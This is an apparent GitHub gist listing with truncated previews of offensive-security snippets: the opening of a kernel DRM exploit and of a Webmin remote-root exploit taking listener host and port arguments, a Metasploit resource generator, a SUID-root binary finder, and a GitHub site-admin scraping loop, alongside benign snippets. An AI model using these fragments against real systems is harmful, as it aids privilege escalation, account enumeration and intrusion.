🔨
Probably breaking your code.

Mark Stealer Whitehall oxagast

/* */
/* gcc drm_i915_ktsploit.c -o kt -ldrm -I/usr/include/libdrm */
/* exploit by oxagast */
/* */
//Jun 17 01:22:05 likon kernel: [ 1788.600973] BUG: unable to handle kernel NULL pointer dereference at 0000000000000010
//Jun 17 01:22:05 likon kernel: [ 1788.600982] IP: __sg_alloc_table_from_pages+0xe4/0x1f0
//Jun 17 01:22:05 likon kernel: [ 1788.600984] PGD 0 P4D 0
//Jun 17 01:22:05 likon kernel: [ 1788.600987] Oops: 0000 [#3] SMP PTI
//Jun 17 01:22:05 likon kernel: [ 1788.600988] Modules linked in: rfcomm appletalk ipx p8023 psnap p8022 llc pci_stub vboxpci(OE) vboxnetadp(OE) vboxnetflt(OE) vboxdrv(OE) snd_hrtimer ccm cmac bnep binfmt_misc arc4 iwlmvm mac80211 hid_multitouch hid_sensor_magn_3d hid_sensor_accel_3d hid_sensor_rotation hid_sensor_incl_3d hid_sensor_als ir_lirc_codec lirc_dev hid_sensor_gyro_3d rtl2832_sdr hid_sensor_trigger industrialio_t
@oxagast
oxagast / autopreter.pl
Last active November 24, 2020 17:18
Automatically generate a custom metasploit.rc resource targeted at an address.
#!/usr/bin/perl
use strict;
use Cwd qw();
my $path = Cwd::cwd();
if ( $path !~ m/metasploit/ ) {
print("err: Your current working directory must be metasploit's.\n");
exit(1);
}
print("autopreter by oxagast\n");
if ( $#ARGV < 1 ) {
echo AAAABCCCC | perl -e '$change = $ARGV[1]; $findme = $ARGV[0]; $let = <STDIN>; $hex = unpack("H*", $let); $reg = qr/$findme/; if ($hex =~ s/(.*)${reg}(.*)/\1$change\2/){$newhex = pack("H*", $hex);} print $newhex;' 414243 444546
@oxagast
oxagast / all_suid.sh
Created October 8, 2017 23:47
Find valid suid root executables on linux
PKG=$(apt-cache search . | cut -f 1 -d ' ');
echo $PKG | xargs apt-get download;
DEB=(`find *.deb`);
for i in ${DEB[@]};
do dpkg -c $i | cut -c 4- | grep ^s | cut -f 2 -d '.' ; done | tee deb_suid_root.txt
for i in {1..10000};
do
curl "https://api.github.com/users/KevinHock/following?per_page=100&page=${i}" -s | tee -a github.ids; # KevinHock follows everyone
sleep 300; # sleep 5 min between pages or rate limit kicks in soon
done;
cat github.ids | grep true -B 18 -A 1 | grep login | cut -d '"' -f 4 | xargs -I {LOGIN} curl "https://api.github.com/users/{LOGIN}" -s | sed -e 's/}/},/' > github_admins.txt
cat github_admins.txt;
@YaaSSDD
YaaSSDD / wmsploit-remote-root-1.29-reprise.sh
Created February 22, 2020 22:45 — forked from oxagast/wmsploit-remote-root-1.29-reprise.sh
Webmin Remote root <1.29 exploit
HOST=$1;
PORT=$2;
LHOST=$3;
LPORT=$4;
if [ $# -lt 4 ]
then
echo "Webmin <1.29 remote root exploit by oxagast"
echo "Priv esc by directory transversal to find cookie in logfile file as root, then session highjack into RCE.";
echo "Thanks to UmZ for directory transversal attack; greets to enki for asking me to try this!";
echo "Usage:"
@oxagast
oxagast / cache_rebuild.sh
Last active December 8, 2021 01:25
Disassembles all binaries in a directory and sorts by most used processor instructions
# finds and sorts most commonly used processor instructions from raw objdump disassembly.
objdump -D /bin/bash | grep -E " .{6,}:" | grep -v '(bad)' | cut -d ':' -f 2 | sort -b -t, -nk2 | uniq -c | sort -n -r | grep -E "\s+[[:digit:]]+\s+.{12,}$" | head -n 15
#!/bin/bash
#
# ./makeitrain.sh bitcoin-qt.crashdump.core
# __ _ _ __ ___ __ ____ ____
# / ( \/ )/ _\ / __)/ _\/ ___(_ )
# ( O ) (/ ( (_ / \___ \ )(
# \__(_/\_\_/\_/\___\_/\_(____/(__)
#
# Donations:
# btc: 34fDhMUkvGVr1s2jQvhwmBfw1xqjstrLed
@oxagast
oxagast / qg.c
Last active February 24, 2023 07:10
Shortest working C quine, works on a nuance of compilers and linkers.
/* touch qg.c && gcc qg.c -o gg.o -c && ld gg.o -o quine 2>/dev/null && ./quine | cat */
@darkwave
darkwave / AndroidDataReceiver.pde
Last active April 7, 2023 12:03
How to receive Android Intent data from another App using Processing
/*
For more information visit Android developer portal http://developer.android.com/training/sharing/receive.html
*/
import android.graphics.BitmapFactory;
import android.graphics.Bitmap;
import java.io.InputStream;
import java.io.FileNotFoundException;
import java.io.IOException;
import android.content.Intent;